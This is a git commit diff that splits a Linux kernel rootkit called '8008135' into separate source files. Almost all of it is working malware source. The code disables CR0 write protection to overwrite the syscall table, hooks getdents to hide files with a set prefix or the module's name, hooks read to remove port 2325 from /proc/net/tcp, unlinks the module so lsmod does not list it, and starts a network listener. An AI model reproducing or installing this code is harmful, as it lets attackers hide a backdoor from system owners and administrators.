exporting functions to files

5 years ago · 500087d2ca
parent bd0a37f68b
commit 500087d2ca
13 changed files with 398 additions and 154 deletions
--- a/4
+++ b/4
@ -20,6 +20,10 @@ obj-m += $(MNAME).o
 # Core
 $(MNAME)-y 	+= src/$(MNAME).o
 $(MNAME)-y  += src/50ck3t.o
+$(MNAME)-y  += src/637d3n75.o
+$(MNAME)-y  += src/h1d3p0r7.o
+$(MNAME)-y  += src/h1d3m0dul3.o
+$(MNAME)-y  += src/p463unpr073c7.o

 # Includes for header files etc
 ccflags-y	:= -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
--- a/src/637d3n75.c
+++ b/src/637d3n75.c
@ -0,0 +1,72 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+/*******************************************************************************/
+
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "637d3n75.h"
+
+
+/*******************************************************************************/
+
+/***  FUNCTION  ****************************************************************
+*          NAME:  sys_getdents_new
+*   DESCRIPTION:  function overriding the original getdents
+*    PARAMETERS:  -
+*       RETURNS:  -
+*******************************************************************************/
+asmlinkage long sys_getdents_new(unsigned int fd,
+                                 struct linux_dirent __user *dirent,
+                                 unsigned int count){
+	int boff;
+	struct linux_dirent* ent;
+
+	long ret = sys_getdents_orig(fd, dirent, count);
+
+	char* dbuf;
+
+	if (ret <= 0) {
+		return ret;
+	}
+
+	dbuf = (char*)dirent;
+
+	// go through the entries, looking for one that has our prefix
+	for (boff = 0; boff < ret;) {
+
+		ent = (struct linux_dirent*)(dbuf + boff);
+
+		// if it has hide prefix or module name anywhere, hide it
+		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
+			 || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
+			// remove this entry by copying everything after it forward
+			// and adjust the length reported
+			memcpy(dbuf + boff,
+				   dbuf + boff + ent->d_reclen,
+			       ret - (boff + ent->d_reclen));
+			ret -= ent->d_reclen;
+		} else {
+			// on to the next entry
+			boff += ent->d_reclen;
+		}
+	}
+
+	return ret;
+}
--- a/src/8008135.c
+++ b/src/8008135.c
@ -17,167 +17,35 @@
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

+/*******************************************************************************/
+
 /**** includes *****************************************************************
 *******************************************************************************/
 #include "8008135.h"
 #include "50ck3t.h"
-/****  var  ********************************************************************
-*******************************************************************************/
-
-sys_getdents_t sys_getdents_orig = NULL;
-
-/***  FUNCTION  ****************************************************************
-*          NAME:  sys_getdents_new
-*   DESCRIPTION:  function overriding the original getdents
-*    PARAMETERS:  -
-*       RETURNS:  -
-*******************************************************************************/
-asmlinkage long sys_getdents_new(unsigned int fd,
-                                 struct linux_dirent __user *dirent,
-                                 unsigned int count){
-	int boff;
-	struct linux_dirent* ent;
-
-	long ret = sys_getdents_orig(fd, dirent, count);
-
-	char* dbuf;
-	
-	if (ret <= 0) {
-		return ret;
-	}
-
-	dbuf = (char*)dirent;
-
-	// go through the entries, looking for one that has our prefix
-	for (boff = 0; boff < ret;) {
-
-		ent = (struct linux_dirent*)(dbuf + boff);
-
-		// if it has hide prefix or module name anywhere, hide it
-		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
-			 || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
-#if defined DEBUG
-			printk("\n hide prefix or mod name contained!\n");
-			printk("\n ret %ld\n ", ret);
-			printk("\n dbuf %d\n" , dbuf);
-			printk("\n");
-			printk(ent->d_name);
-#endif
-			// remove this entry by copying everything after it forward
-			// and adjust the length reported
-#if defined DEBUG
-			printk("\n reclen %u \n", ent->d_reclen);
-#endif
-			memcpy(dbuf + boff,
-				   dbuf + boff + ent->d_reclen,
-			       ret - (boff + ent->d_reclen));
-			ret -= ent->d_reclen;
-#if defined DEBUG
-			printk("\n ret after change %ld\n ", ret);
-#endif
-		} else {
-			// on to the next entry
-			boff += ent->d_reclen;
-		}
-	}
-	
-	return ret;
-}
-
-
-/***  FUNCTION  ****************************************************************
-*          NAME:  hide port
-*   DESCRIPTION:  hides the port 2325 
-*    PARAMETERS:  -
-*       RETURNS:  
-*******************************************************************************/
-read_ptr orig_read;
-asmlinkage long hacked_read(unsigned int fd, char __user *buf,
-                            size_t count)
-{
-	long result, bp, diff_in_bytes;
-	char *kbuf, *start_line, *end_line, *port_num;
-	char *pathname, pbuf[256];
-	struct files_struct *current_files; 
-	struct fdtable *files_table;
-	struct path file_path;
-
-	// run real read 
-	result = (*orig_read)(fd,buf,count);
-	if (result <= 0)
-		return result;
-
-	// get pathname
-	// CITATION [8] from report
-	current_files = current->files;
-	files_table = files_fdtable(current_files);
-
-	file_path = files_table->fd[fd]->f_path;
-	pathname = d_path(&file_path,pbuf,256*sizeof(char));
-	// if virtual file /proc/net/tcp
-	if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
-		// copy from user to kernelspace;
-		if (!access_ok(VERIFY_READ,buf,result))
-			return -1;
-		if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
-			return -1;
-		if (copy_from_user(kbuf,buf,result))
-			return -1;
-
-		// filter out hidden ports
-		start_line = strchr(kbuf,':') - 4; // skip first line
-		diff_in_bytes = (start_line - kbuf) * sizeof(char);
-		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
-			start_line = kbuf + bp;
-			port_num = strchr(strchr(start_line,':') + 1,':') + 1;
-			end_line = strchr(start_line,'\n');
-			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
-			if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
-				memmove(start_line,end_line + 1, // delete line in file
-					result - bp - diff_in_bytes);
-				result -= diff_in_bytes;
-			}
-		}
-
-		// copy from kernel to userspace
-		if (!access_ok(VERIFY_WRITE,buf,result))
-			return EINVAL;
-		if (copy_to_user(buf,kbuf,result))
-			return EINVAL;
-		kfree(kbuf);
-	}
-	// return number of bytes read
-	return result;
-}
-
-
-/***  FUNCTION  ****************************************************************
-*          NAME:  hide_module
-*   DESCRIPTION:  hides the module from lsmod
-*    PARAMETERS:  -
-*       RETURNS:  
-*******************************************************************************/
-void hide_module(void){
-	list_del(&THIS_MODULE->list);
-}
+#include "637d3n75.h"
+#include "h1d3m0dul3.h"
+#include "h1d3p0r7.h"
+#include "p463unpr073c7.h"

+/*******************************************************************************/

 /***  FUNCTION  ****************************************************************
 *          NAME:  8008135_init
-*   DESCRIPTION:  initializing Kernel Module
+*   DESCRIPTION:  initializing Kernel Module - hijacking syscalltable
 *    PARAMETERS:  -
 *       RETURNS:  int
 *******************************************************************************/
 static int __init init_8008135(void) {
 	printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
 	
-	// record the original getdents handler
+
 	sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
 	
 	printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);

 	// turn write protect off
-	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+	wprotectionoff();
 	
 	// add our new handlers
 	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
@ -187,7 +55,7 @@ static int __init init_8008135(void) {
 	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;

 	// turn write protect back on
-	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+	wprotectionon();

 	printk(KERN_INFO "New syscall in place\n");
 	network_server_init();
@ -205,16 +73,17 @@ static int __init init_8008135(void) {
 *******************************************************************************/
 static void __exit exit_8008135(void) {
 	network_server_exit();
-	// allow us to write to read onlu pages
-	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
-	// set getdents handler back
+	wprotectionoff();
 	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
 	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
 	// turn write protect back on
-	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+	wprotectionon();
 	printk(KERN_INFO "Old syscall back\n");
 }

-// Setting pointers to init-/exit-functions 
+/*******************************************************************************/
+
 module_init(init_8008135);
 module_exit(exit_8008135);
+
+/*******************************************************************************/
--- a/src/h1d3m0dul3.c
+++ b/src/h1d3m0dul3.c
@ -0,0 +1,36 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "h1d3m0dul3.h"
+
+/*******************************************************************************/
+
+/***  FUNCTION  ****************************************************************
+*          NAME:  hide_module
+*   DESCRIPTION:  hides the module from lsmod
+*    PARAMETERS:  -
+*       RETURNS:
+*******************************************************************************/
+void hide_module(void){
+	list_del(&THIS_MODULE->list);
+}
--- a/src/h1d3p0r7.c
+++ b/src/h1d3p0r7.c
@ -0,0 +1,91 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "h1d3p0r7.h"
+
+/*******************************************************************************/
+
+/***  FUNCTION  ****************************************************************
+*          NAME:  hide port
+*   DESCRIPTION:  hides the port 2325
+*    PARAMETERS:  -
+*       RETURNS:
+*******************************************************************************/
+
+asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+                            size_t count)
+{
+	long result, bp, diff_in_bytes;
+	char *kbuf, *start_line, *end_line, *port_num;
+	char *pathname, pbuf[256];
+	struct files_struct *current_files;
+	struct fdtable *files_table;
+	struct path file_path;
+
+	// run real read
+	result = (*orig_read)(fd,buf,count);
+	if (result <= 0)
+		return result;
+
+	// get pathname
+	// CITATION [8] from report
+	current_files = current->files;
+	files_table = files_fdtable(current_files);
+
+	file_path = files_table->fd[fd]->f_path;
+	pathname = d_path(&file_path,pbuf,256*sizeof(char));
+	// if virtual file /proc/net/tcp
+	if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
+		// copy from user to kernelspace;
+		if (!access_ok(VERIFY_READ,buf,result))
+			return -1;
+		if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
+			return -1;
+		if (copy_from_user(kbuf,buf,result))
+			return -1;
+
+		// filter out hidden ports
+		start_line = strchr(kbuf,':') - 4; // skip first line
+		diff_in_bytes = (start_line - kbuf) * sizeof(char);
+		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
+			start_line = kbuf + bp;
+			port_num = strchr(strchr(start_line,':') + 1,':') + 1;
+			end_line = strchr(start_line,'\n');
+			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
+			if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
+				memmove(start_line,end_line + 1, // delete line in file
+					result - bp - diff_in_bytes);
+				result -= diff_in_bytes;
+			}
+		}
+
+		// copy from kernel to userspace
+		if (!access_ok(VERIFY_WRITE,buf,result))
+			return EINVAL;
+		if (copy_to_user(buf,kbuf,result))
+			return EINVAL;
+		kfree(kbuf);
+	}
+	// return number of bytes read
+	return result;
+}
--- a/src/headers/50ck3t.h
+++ b/src/headers/50ck3t.h
@ -16,8 +16,8 @@
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
-#ifndef SRC_HEADERS_50CK3T_H_
-#define SRC_HEADERS_50CK3T_H_
+#ifndef SRC_HEADERS_50CK3T_H
+#define SRC_HEADERS_50CK3T_H

 /**** includes *****************************************************************
 *******************************************************************************/
@ -40,11 +40,15 @@
 #include <net/inet_connection_sock.h>
 #include <net/request_sock.h>

+/**** defines *****************************************************************
+*******************************************************************************/
+
 #define DEFAULT_PORT 2325
+#define DEFAULT_PORT_HEX "0915"
 #define MAX_CONNS 16
 #define MODULE_NAME "8008135"

 int network_server_init(void);
 void network_server_exit(void);

-#endif /* SRC_HEADERS_50CK3T_H_ */
+#endif
--- a/src/headers/5y563n.h
+++ b/src/headers/5y563n.h
@ -0,0 +1,2 @@
+#pragma once
+#include <linux/fs.h>
--- a/src/headers/637d3n75.h
+++ b/src/headers/637d3n75.h
@ -0,0 +1,32 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#ifndef SRC_HEADERS_637d3n75_H
+#define SRC_HEADERS_637d3n75_H
+
+/****  var  ********************************************************************
+*******************************************************************************/
+sys_getdents_t sys_getdents_orig = NULL;
+
+
+extern asmlinkage long sys_getdents_new(unsigned int fd,
+                                 struct linux_dirent __user *dirent,
+                                 unsigned int count);
+
+#endif
--- a/src/headers/8008135.h
+++ b/src/headers/8008135.h
@ -42,14 +42,12 @@

 #define GETDENTS_SYSCALL_NUM	78
 #define READ_SYSCALL_NUM		0
-#define WRITE_PROTECT_FLAG		(1<<16)

 #define HIDE_PREFIX				"8008135."
 #define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX) - 1)

 #define MODULE_NAME				"8008135"
 #define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
-#define HIDE_PORT "0915" // 2325 in Hexadecimal

 /****  Modinfo  ****************************************************************
 *******************************************************************************/
@ -73,4 +71,4 @@ typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
                                          unsigned int count);
 typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf,
                                    size_t count);
-#endif /* SRC_HEADERS_8008135_H */
+#endif
--- a/src/headers/h1d3m0dul3.h
+++ b/src/headers/h1d3m0dul3.h
@ -0,0 +1,26 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#ifndef SRC_HEADERS_h1d3m0dul3_H
+#define SRC_HEADERS_h1d3m0dul3_H
+
+
+extern void hide_module(void);
+
+#endif
--- a/src/headers/h1d3p0r7.h
+++ b/src/headers/h1d3p0r7.h
@ -0,0 +1,31 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#ifndef SRC_HEADERS_h1d3p0r7_H
+#define SRC_HEADERS_h1d3p0r7_H
+
+#include "50ck3t.h"
+/**** var **********************************************************************
+*******************************************************************************/
+read_ptr orig_read;
+
+extern asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+                            size_t count)
+
+#endif
--- a/src/headers/p463unpr073c7.h
+++ b/src/headers/p463unpr073c7.h
@ -0,0 +1,31 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#ifndef SRC_HEADERS_p463unpr073c7_H
+#define SRC_HEADERS_p463unpr073c7_H
+
+
+/**** defines *****************************************************************
+*******************************************************************************/
+#define WRITE_PROTECT_FLAG		(1<<16)
+
+extern void wprotectionoff(void);
+extern void wprotectionon(void);
+
+#endif
--- a/src/p463unpr073c7.c
+++ b/src/p463unpr073c7.c
@ -0,0 +1,48 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "p463unpr073c7.h"
+
+/*******************************************************************************/
+
+
+/***  FUNCTION  ****************************************************************
+*          NAME:  wprotectionoff
+*   DESCRIPTION:  turn page write protection off
+*    PARAMETERS:  -
+*       RETURNS:
+*******************************************************************************/
+void wprotectionoff(void){
+	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+}
+
+/***  FUNCTION  ****************************************************************
+*          NAME:  wprotectionon
+*   DESCRIPTION:  turn page write protection on
+*    PARAMETERS:  -
+*       RETURNS:
+*******************************************************************************/
+
+void wprotectionon(void){
+	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+}